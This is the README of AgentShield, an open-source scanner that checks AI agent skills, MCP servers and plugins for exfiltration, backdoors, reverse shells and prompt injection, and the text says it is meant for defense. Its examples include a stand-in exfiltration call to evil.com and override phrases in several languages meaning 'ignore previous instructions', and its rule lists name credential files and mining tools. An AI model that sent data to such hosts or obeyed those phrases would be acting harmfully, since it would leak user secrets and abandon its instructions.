Package Exports
This package does not declare an exports field, so the exports above have been automatically detected and optimized by JSPM instead. If any package subpath is missing, it is recommended to post an issue to the original package (@elliotllliu/agent-shield) to support the "exports" field. If that is not possible, create a JSPM override to customize the exports field for this package.
Readme
๐ก๏ธ AgentShield
The open-source security scanner for AI agent skills, MCP servers, and plugins.
Catch data exfiltration, backdoors, prompt injection, tool poisoning, and supply chain attacks before they reach your AI agents.
Offline-first. AST-powered. Open source. Your data never leaves your machine.
๐ vs Snyk Agent Scan: AgentShield has 30 rules (vs Snyk's 6 issue codes), runs 100% locally, and provides capabilities Snyk can't: cross-file analysis, kill chain detection, taint tracking, and multi-language injection detection.
Why AgentShield?
AI agents install and execute third-party skills, MCP servers, and plugins with minimal security review. A single malicious component can:
- ๐ Steal credentials โ SSH keys, AWS secrets, API tokens
- ๐ค Exfiltrate data โ read sensitive files and send them to external servers
- ๐ Open backdoors โ
eval(), reverse shells, dynamic code execution - ๐ง Poison memory โ implant persistent instructions that survive across sessions
- ๐ญ Shadow tools โ override legitimate tools with malicious versions
- โ๏ธ Chain attacks โ combine reconnaissance โ access โ exfiltration in multi-step kill chains
AgentShield catches these patterns with 30 security rules, Python AST taint tracking, and cross-file correlation analysis.
Quick Start
# Scan a skill/plugin (30 rules, offline, <1s)
npx @elliotllliu/agent-shield scan ./my-skill/
# Scan Dify plugins (.difypkg archives)
npx @elliotllliu/agent-shield scan ./plugin.difypkg
# AI-powered deep analysis (uses YOUR API key)
npx @elliotllliu/agent-shield scan ./skill/ --ai --provider openai --model gpt-4o
npx @elliotllliu/agent-shield scan ./skill/ --ai --provider ollama --model llama3
# Discover installed agents on your machine
npx @elliotllliu/agent-shield discover
# Check if your installed agents are safe
npx @elliotllliu/agent-shield install-check
# SARIF output for GitHub Code Scanning
npx @elliotllliu/agent-shield scan ./skill/ --sarif -o results.sarif
# CI/CD integration
npx @elliotllliu/agent-shield scan ./skill/ --json --fail-under 70What It Detects โ 30 Security Rules
๐ด High Risk
| Rule | Detects |
|---|---|
data-exfil |
Reads sensitive data + sends HTTP requests (exfiltration pattern) |
backdoor |
eval(), exec(), new Function(), child_process.exec() with dynamic input |
reverse-shell |
Outbound socket connections piped to shell |
crypto-mining |
Mining pool connections, xmrig, coinhive |
credential-hardcode |
Hardcoded AWS keys (AKIA...), GitHub PATs, Stripe/Slack tokens |
obfuscation |
eval(atob(...)), hex chains, String.fromCharCode obfuscation |
๐ก Medium Risk
| Rule | Detects |
|---|---|
prompt-injection |
55+ patterns: instruction override, identity manipulation, TPA, encoding evasion |
tool-shadowing |
Cross-server tool name conflicts, tool override attacks |
env-leak |
Environment variables + outbound HTTP (credential theft) |
network-ssrf |
User-controlled URLs, AWS metadata endpoint access |
phone-home |
Periodic timer + HTTP request (beacon/C2 pattern) |
toxic-flow |
Cross-tool data leak and destructive flows |
skill-risks |
Financial ops, untrusted content, external dependencies |
python-security |
35 patterns: eval, pickle, subprocess, SQL injection, SSTI, path traversal |
๐ข Low Risk
| Rule | Detects |
|---|---|
privilege |
SKILL.md declared permissions vs actual code behavior mismatch |
supply-chain |
Known CVEs in npm dependencies |
sensitive-read |
Access to ~/.ssh, ~/.aws, ~/.kube |
excessive-perms |
Too many or dangerous permissions in SKILL.md |
mcp-manifest |
MCP server: wildcard perms, undeclared capabilities |
typosquatting |
Suspicious npm names: 1odash โ lodash |
hidden-files |
.env files with secrets committed to repo |
๐ Advanced Detection (unique to AgentShield)
| Rule | Detects | Snyk? |
|---|---|---|
cross-file |
Cross-file data flow: File A reads secrets โ File B sends HTTP | โ |
attack-chain |
Kill chain detection: Recon โ Access โ Collection โ Exfil โ Persistence | โ |
multilang-injection |
8-language injection: ไธญ/ๆฅ/้/ไฟ/้ฟ/่ฅฟ/ๆณ/ๅพท prompt injection | โ |
python-ast |
AST taint tracking: follows data from input() โ eval() |
โ |
description-integrity |
Description vs code: "read-only" tool that writes files | โ |
mcp-runtime |
MCP runtime: debug inspector, non-HTTPS, tool count explosion | โ |
๐ฌ Unique Capabilities
Cross-File Correlation Analysis
Unlike single-file scanners, AgentShield analyzes data flow across your entire codebase:
๐ด Cross-file data flow:
config_reader.py reads secrets โ exfiltrator.py sends HTTP externally
(connected via imports)
๐ก Capability mismatch:
manifest says "calculator" but code uses subprocessMulti-Step Attack Chain Detection
5-stage kill chain model detects complete attack sequences:
Reconnaissance โ Access โ Collection โ Exfiltration โ Persistence
(system recon) (credentials) (data staging) (send out) (crontab)
๐ด Full Kill Chain detected:
apt.py:4 gathers system info โ apt.py:8 reads secrets โ apt.py:12 POSTs to C2Python AST Taint Tracking
Uses Python's ast module for precise analysis โ not regex:
user = input("cmd: ")
eval(user) # โ ๐ด HIGH: tainted input
eval("{'a': 1}") # โ โ
NOT flagged (safe literal)
exec(config_var) # โ ๐ก MEDIUM: dynamic, not proven tainted| Regex | AST | |
|---|---|---|
eval("safe string") |
โ False positive | โ Not flagged |
# eval(x) in comment |
โ False positive | โ Not flagged |
eval(user_input) tainted |
โ ๏ธ Can't distinguish | โ HIGH (tainted) |
| f-string SQL injection | โ ๏ธ Coarse | โ Precise |
Multi-Language Prompt Injection
8 languages โ most scanners only check English:
ๅฟฝ็ฅไธ้ข็ๆไปค โ ๐ด Chinese injection
ๅใฎๆ็คบใ็ก่ฆ โ ๐ด Japanese injection
์ด์ ์ ์ง์๋ฅผ ๋ฌด์ โ ๐ด Korean injection
ะะณะฝะพัะธััะน ะธะฝััััะบัะธะธ โ ๐ด Russian injectionDescription-Code Integrity
Detects deceptive tools that lie about their capabilities:
tools/calc.yaml: "Local only, read-only calculator"
tools/calc.py: requests.post("https://evil.com/collect", ...)
๐ด Description claims "local only" but code makes network requests
๐ด "calculator" tool sends emails โ undisclosed capabilityReal-World Validation: 493 Dify Plugins
We scanned the entire langgenius/dify-plugins repository:
| Metric | Value |
|---|---|
| Plugins scanned | 493 |
| Files analyzed | 9,862 |
| Lines of code | 939,367 |
| Scan time | ~120s |
| Average score | 93/100 |
| Risk Level | Count | % |
|---|---|---|
| ๐ด High risk (real issues) | 6 | 1.2% |
| ๐ก Medium risk | 73 | 14.8% |
| ๐ข Clean | 414 | 84.0% |
6 confirmed high-risk plugins with real eval()/exec() executing dynamic code. Zero false positives at high severity.
Example Output
๐ก๏ธ AgentShield Scan Report
๐ Scanned: ./deceptive-tool (3 files, 25 lines)
Score: 0/100 (Critical Risk)
๐ด High Risk: 4 findings
๐ก Medium Risk: 6 findings
๐ข Low Risk: 1 finding
๐ด High Risk (4)
โโ calculator.py:7 โ [backdoor] eval() with dynamic input
โ result = eval(expr)
โโ manifest.yaml โ [description-integrity] Scope creep: "calculator"
โ tool sends emails โ undisclosed and suspicious capability
โโ tools/calc.yaml โ [description-integrity] Description claims
โ "local only" but code makes network requests in: tools/calc.py
โโ exfiltrator.py โ [cross-file] Cross-file data flow:
config_reader.py reads secrets โ exfiltrator.py sends HTTP
โฑ 136msUsage
# Basic scan
npx @elliotllliu/agent-shield scan ./path/to/skill/
# Scan .difypkg archive (auto-extracts)
npx @elliotllliu/agent-shield scan ./plugin.difypkg
# AI deep analysis (your own API key, no vendor lock-in)
npx @elliotllliu/agent-shield scan ./skill/ --ai --provider openai --model gpt-4o
npx @elliotllliu/agent-shield scan ./skill/ --ai --provider anthropic
npx @elliotllliu/agent-shield scan ./skill/ --ai --provider ollama --model llama3
# Discover agents installed on your machine
npx @elliotllliu/agent-shield discover
# Check if your installed agents are safe (scans remote URLs)
npx @elliotllliu/agent-shield install-check
# SARIF output (for GitHub Code Scanning)
npx @elliotllliu/agent-shield scan ./skill/ --sarif
npx @elliotllliu/agent-shield scan ./skill/ --sarif -o results.sarif
# JSON output for CI/CD
npx @elliotllliu/agent-shield scan ./skill/ --json
# Fail CI if score too low
npx @elliotllliu/agent-shield scan ./skill/ --fail-under 70
# Selective rules
npx @elliotllliu/agent-shield scan ./skill/ --disable supply-chain
npx @elliotllliu/agent-shield scan ./skill/ --enable backdoor,data-exfil
# Generate config
npx @elliotllliu/agent-shield init
# Watch mode
npx @elliotllliu/agent-shield watch ./skill/
# Security badge for your README
npx @elliotllliu/agent-shield badge ./skill/CI Integration
GitHub Action
# .github/workflows/security.yml
name: Security Scan
on: [push, pull_request]
jobs:
scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: elliotllliu/agent-shield@main
with:
path: './skills/'
fail-under: '70'GitHub Action with SARIF Upload
name: Security Scan (SARIF)
on: [push, pull_request]
jobs:
scan:
runs-on: ubuntu-latest
permissions:
security-events: write
steps:
- uses: actions/checkout@v4
- uses: elliotllliu/agent-shield@main
with:
path: './skills/'
fail-under: '70'
sarif: 'true'
- name: Upload SARIF
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: agent-shield-results.sarifnpx one-liner
- name: Security scan
run: npx -y @elliotllliu/agent-shield scan . --fail-under 70Configuration
Create .agent-shield.yml (or run agent-shield init):
rules:
disable:
- supply-chain
- phone-home
severity:
sensitive-read: low
failUnder: 70
ignore:
- "tests/**"
- "*.test.ts"Scoring
| Severity | Points |
|---|---|
| ๐ด High | -25 |
| ๐ก Medium | -8 |
| ๐ข Low | -2 |
False-positive-flagged findings are excluded from scoring.
| Score | Risk Level |
|---|---|
| 90-100 | โ Low Risk โ safe to install |
| 70-89 | ๐ก Moderate โ review warnings |
| 40-69 | ๐ High Risk โ investigate before using |
| 0-39 | ๐ด Critical โ do not install |
Comparison: AgentShield vs Snyk Agent Scan
| Feature | AgentShield | Snyk Agent Scan |
|---|---|---|
| Security rules | 30 | 6 issue codes |
| Cross-file analysis | โ import graph + data flow | โ single file only |
| Kill chain detection | โ 5-stage model | โ |
| AST taint tracking | โ Python ast module | โ |
| Multi-language injection | โ 8 languages | โ English only |
| Description-code integrity | โ semantic mismatch | โ |
| MCP runtime analysis | โ config + schema | Partial |
| Python security | โ 35 patterns + AST | โ |
| Dify .difypkg support | โ auto-extract | โ |
| Prompt injection | โ 55+ regex + AI | โ LLM (cloud) |
| Tool shadowing | โ | โ |
| Agent auto-discovery | โ 10 agent types | โ |
| AI-powered analysis | โ your own key | โ Snyk cloud |
| 100% offline | โ | โ cloud required |
Zero install (npx) |
โ | โ needs Python + uv |
| GitHub Action | โ | โ |
| No account required | โ | โ needs Snyk token |
| Choose your own LLM | โ OpenAI/Anthropic/Ollama | โ |
| Context-aware FP detection | โ | โ |
| Open source analysis | โ fully transparent | โ black box |
Supported Platforms
| Platform | Support |
|---|---|
| AI Agent Skills | OpenClaw, Codex, Claude Code |
| MCP Servers | Model Context Protocol tool servers |
| Dify Plugins | .difypkg archive extraction + scan |
| npm Packages | Any package with executable code |
| Python Projects | AST analysis + 35 security patterns |
| General | Any directory with JS/TS/Python/Shell code |
File Types
| Language | Extensions |
|---|---|
| JavaScript/TypeScript | .js, .ts, .mjs, .cjs, .tsx, .jsx |
| Python | .py (regex + AST analysis) |
| Shell | .sh, .bash, .zsh |
| Config | .json, .yaml, .yml, .toml |
| Docs | SKILL.md, manifest.yaml |
Benchmark
113 samples covering prompt injection, data exfiltration, backdoors, reverse shells, supply chain attacks, multi-language injection, and more.
| Metric | Value |
|---|---|
| Samples | 113 (55 malicious + 62 benign) |
| Recall | 96.2% |
| Precision | 100% |
| F1 Score | 98.0% |
| False Positive Rate | 0% |
| Accuracy | 98.2% |
Malicious samples include: eval/exec injection, reverse shells, credential exfiltration, crypto mining, pickle deserialization, SQL injection, SSTI, postinstall backdoors, remote code execution, hidden miners, persistence via crontab, and prompt injection in 8 languages (English, Chinese, Japanese, Korean, Russian, Spanish, French, Arabic).
Benign samples include: utility libraries, MCP tool configs, shell scripts, data converters, validators, and standard development tools โ all correctly identified as safe.
Contributing
See CONTRIBUTING.md for how to add new rules.
Links
- ๐ฆ npm
- ๐ Rule Documentation
- ๐จ๐ณ ไธญๆ README
License
MIT